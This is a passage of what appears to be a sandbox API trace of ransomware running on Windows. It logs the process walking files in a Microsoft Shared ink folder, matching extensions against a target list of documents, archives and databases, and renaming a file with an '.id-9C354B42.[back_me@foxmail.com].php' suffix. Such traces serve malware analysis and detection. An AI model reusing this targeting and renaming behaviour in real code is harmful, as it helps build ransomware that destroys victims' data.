Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0241.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0241.872] lstrlenW (lpString=".doc") returned 4 [0241.872] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0241.872] lstrlenW (lpString=".docx") returned 5 [0241.872] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0241.872] lstrlenW (lpString=".pdf") returned 4 [0241.872] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0241.872] lstrlenW (lpString=".xls") returned 4 [0241.872] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0241.872] lstrlenW (lpString=".xlsx") returned 5 [0241.872] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0241.872] lstrlenW (lpString=".ppt") returned 4 [0241.872] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0241.873] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0241.873] lstrlenW (lpString=".zip") returned 4 [0241.873] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0241.873] lstrlenW (lpString=".rar") returned 4 [0241.873] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0241.873] lstrlenW (lpString=".bz2") returned 4 [0241.873] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0241.873] lstrlenW (lpString=".7z") returned 3 [0241.873] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0241.873] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0241.873] lstrlenW (lpString=".dbf") returned 4 [0241.873] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0241.873] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0241.873] lstrlenW (lpString=".1cd") returned 4 [0241.873] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0241.873] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0241.873] lstrlenW (lpString=".jpg") returned 4 [0241.873] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0241.873] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0241.873] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0241.873] lstrlenW (lpString=".doc") returned 4 [0241.873] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0241.873] lstrlenW (lpString=".docx") returned 5 [0241.873] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0241.873] lstrlenW (lpString=".pdf") returned 4 [0241.873] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0241.873] lstrlenW (lpString=".xls") returned 4 [0241.873] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0241.874] lstrlenW (lpString=".xlsx") returned 5 [0241.874] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0241.874] lstrlenW (lpString=".ppt") returned 4 [0241.874] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0241.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0241.874] lstrlenW (lpString=".zip") returned 4 [0241.874] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0241.874] lstrlenW (lpString=".rar") returned 4 [0241.874] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0241.874] lstrlenW (lpString=".bz2") returned 4 [0241.874] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0241.874] lstrlenW (lpString=".7z") returned 3 [0241.874] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0241.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0241.874] lstrlenW (lpString=".dbf") returned 4 [0241.874] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0241.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0241.874] lstrlenW (lpString=".1cd") returned 4 [0241.874] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0241.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0241.874] lstrlenW (lpString=".jpg") returned 4 [0241.874] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0241.874] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0241.874] lstrlenW (lpString="delete.avi") returned 10 [0241.874] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0241.877] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x392ff1c | out: lpFileSize=0x392ff1c*=224256) returned 1 [0241.877] CloseHandle (hObject=0x24c) returned 1 [0241.877] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0x20 [0241.877] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.877] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0241.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0241.877] lstrlenW (lpString=".doc") returned 4 [0241.877] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0241.877] lstrlenW (lpString=".docx") returned 5 [0241.877] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0241.877] lstrlenW (lpString=".pdf") returned 4 [0241.877] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0241.877] lstrlenW (lpString=".xls") returned 4 [0241.877] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0241.877] lstrlenW (lpString=".xlsx") returned 5 [0241.877] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0241.877] lstrlenW (lpString=".ppt") returned 4 [0241.877] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0241.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0241.877] lstrlenW (lpString=".zip") returned 4 [0241.877] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0241.877] lstrlenW (lpString=".rar") returned 4 [0241.877] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0241.877] lstrlenW (lpString=".bz2") returned 4 [0241.878] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0241.878] lstrlenW (lpString=".7z") returned 3 [0241.878] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0241.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0241.878] lstrlenW (lpString=".dbf") returned 4 [0241.878] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0241.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0241.878] lstrlenW (lpString=".1cd") returned 4 [0241.878] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0241.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0241.878] lstrlenW (lpString=".jpg") returned 4 [0241.878] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0241.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0241.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0241.878] lstrlenW (lpString=".doc") returned 4 [0241.878] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0241.878] lstrlenW (lpString=".docx") returned 5 [0241.878] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0241.878] lstrlenW (lpString=".pdf") returned 4 [0241.878] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0241.878] lstrlenW (lpString=".xls") returned 4 [0241.878] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0241.878] lstrlenW (lpString=".xlsx") returned 5 [0241.878] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0241.878] lstrlenW (lpString=".ppt") returned 4 [0241.878] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0241.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0241.879] lstrlenW (lpString=".zip") returned 4 [0241.879] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0241.879] lstrlenW (lpString=".rar") returned 4 [0241.879] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0241.879] lstrlenW (lpString=".bz2") returned 4 [0241.879] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0241.879] lstrlenW (lpString=".7z") returned 3 [0241.879] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0241.879] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0241.879] lstrlenW (lpString=".dbf") returned 4 [0241.879] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0241.879] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0241.879] lstrlenW (lpString=".1cd") returned 4 [0241.879] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0241.879] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0241.879] lstrlenW (lpString=".jpg") returned 4 [0241.879] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0241.879] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0241.879] lstrlenW (lpString="join.avi") returned 8 [0241.879] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0241.880] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x392ff1c | out: lpFileSize=0x392ff1c*=222208) returned 1 [0241.880] CloseHandle (hObject=0x24c) returned 1 [0241.880] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20 [0241.880] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.880] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0241.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0241.880] lstrlenW (lpString=".doc") returned 4 [0241.880] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0241.880] lstrlenW (lpString=".docx") returned 5 [0241.880] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0241.880] lstrlenW (lpString=".pdf") returned 4 [0241.880] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0241.880] lstrlenW (lpString=".xls") returned 4 [0241.880] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0241.881] lstrlenW (lpString=".xlsx") returned 5 [0241.881] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0241.881] lstrlenW (lpString=".ppt") returned 4 [0241.881] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0241.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0241.881] lstrlenW (lpString=".zip") returned 4 [0241.881] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0241.881] lstrlenW (lpString=".rar") returned 4 [0241.881] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0241.881] lstrlenW (lpString=".bz2") returned 4 [0241.881] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0241.881] lstrlenW (lpString=".7z") returned 3 [0241.881] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0241.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0241.881] lstrlenW (lpString=".dbf") returned 4 [0241.881] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0241.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0241.881] lstrlenW (lpString=".1cd") returned 4 [0241.881] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0241.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0241.881] lstrlenW (lpString=".jpg") returned 4 [0241.881] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0241.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0241.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0241.881] lstrlenW (lpString=".doc") returned 4 [0241.881] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0241.881] lstrlenW (lpString=".docx") returned 5 [0241.881] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0241.881] lstrlenW (lpString=".pdf") returned 4 [0241.882] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0241.882] lstrlenW (lpString=".xls") returned 4 [0241.882] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0241.882] lstrlenW (lpString=".xlsx") returned 5 [0241.882] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0241.882] lstrlenW (lpString=".ppt") returned 4 [0241.882] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0241.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0241.882] lstrlenW (lpString=".zip") returned 4 [0241.882] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0241.882] lstrlenW (lpString=".rar") returned 4 [0241.882] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0241.882] lstrlenW (lpString=".bz2") returned 4 [0241.882] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0241.882] lstrlenW (lpString=".7z") returned 3 [0241.882] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0241.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0241.882] lstrlenW (lpString=".dbf") returned 4 [0241.882] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0241.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0241.882] lstrlenW (lpString=".1cd") returned 4 [0241.882] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0241.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0241.882] lstrlenW (lpString=".jpg") returned 4 [0241.882] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0241.883] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0241.883] lstrlenW (lpString="split.avi") returned 9 [0241.883] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0241.883] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x392ff1c | out: lpFileSize=0x392ff1c*=194048) returned 1 [0241.883] CloseHandle (hObject=0x24c) returned 1 [0241.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0x20 [0241.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.883] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0241.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0241.883] lstrlenW (lpString=".doc") returned 4 [0241.883] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0241.883] lstrlenW (lpString=".docx") returned 5 [0241.883] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0241.883] lstrlenW (lpString=".pdf") returned 4 [0241.883] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0241.883] lstrlenW (lpString=".xls") returned 4 [0241.883] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0241.883] lstrlenW (lpString=".xlsx") returned 5 [0241.883] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0241.883] lstrlenW (lpString=".ppt") returned 4 [0241.883] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0241.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0241.884] lstrlenW (lpString=".zip") returned 4 [0241.884] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0241.884] lstrlenW (lpString=".rar") returned 4 [0241.884] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0241.884] lstrlenW (lpString=".bz2") returned 4 [0241.884] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0241.884] lstrlenW (lpString=".7z") returned 3 [0241.884] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0241.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0241.884] lstrlenW (lpString=".dbf") returned 4 [0241.884] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0241.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0241.884] lstrlenW (lpString=".1cd") returned 4 [0241.884] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0241.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0241.884] lstrlenW (lpString=".jpg") returned 4 [0241.884] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0241.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0241.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0241.884] lstrlenW (lpString=".doc") returned 4 [0241.884] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0241.884] lstrlenW (lpString=".docx") returned 5 [0241.884] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0241.884] lstrlenW (lpString=".pdf") returned 4 [0241.884] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0241.884] lstrlenW (lpString=".xls") returned 4 [0241.884] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0241.884] lstrlenW (lpString=".xlsx") returned 5 [0241.885] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0241.885] lstrlenW (lpString=".ppt") returned 4 [0241.885] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0241.885] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0241.885] lstrlenW (lpString=".zip") returned 4 [0241.885] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0241.885] lstrlenW (lpString=".rar") returned 4 [0241.885] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0241.885] lstrlenW (lpString=".bz2") returned 4 [0241.885] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0241.885] lstrlenW (lpString=".7z") returned 3 [0241.885] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0241.885] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0241.885] lstrlenW (lpString=".dbf") returned 4 [0241.885] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0241.885] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0241.885] lstrlenW (lpString=".1cd") returned 4 [0241.885] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0241.885] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0241.885] lstrlenW (lpString=".jpg") returned 4 [0241.885] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0241.885] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0241.885] lstrlenW (lpString="FlickAnimation.avi") returned 18 [0241.885] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0241.886] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x392ff1c | out: lpFileSize=0x392ff1c*=1600388) returned 1 [0241.886] CloseHandle (hObject=0x24c) returned 1 [0241.886] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0x20 [0241.886] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.886] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0241.886] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0241.886] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0241.886] lstrlenW (lpString=".doc") returned 4 [0241.886] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0241.886] lstrlenW (lpString=".docx") returned 5 [0241.886] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0241.886] lstrlenW (lpString=".pdf") returned 4 [0241.886] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0241.886] lstrlenW (lpString=".xls") returned 4 [0241.886] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0241.886] lstrlenW (lpString=".xlsx") returned 5 [0241.886] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0241.886] lstrlenW (lpString=".ppt") returned 4 [0241.886] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0241.886] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0241.886] lstrlenW (lpString=".zip") returned 4 [0241.886] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0241.886] lstrlenW (lpString=".rar") returned 4 [0241.887] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0241.887] lstrlenW (lpString=".bz2") returned 4 [0241.887] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0241.887] lstrlenW (lpString=".7z") returned 3 [0241.887] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0241.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0241.887] lstrlenW (lpString=".dbf") returned 4 [0241.887] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0241.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0241.887] lstrlenW (lpString=".1cd") returned 4 [0241.887] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0241.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0241.887] lstrlenW (lpString=".jpg") returned 4 [0241.887] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0241.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0241.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0241.887] lstrlenW (lpString=".doc") returned 4 [0241.887] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0241.887] lstrlenW (lpString=".docx") returned 5 [0241.887] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0241.887] lstrlenW (lpString=".pdf") returned 4 [0241.887] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0241.887] lstrlenW (lpString=".xls") returned 4 [0241.887] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0241.887] lstrlenW (lpString=".xlsx") returned 5 [0241.887] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0241.887] lstrlenW (lpString=".ppt") returned 4 [0241.888] lstrcmpiW 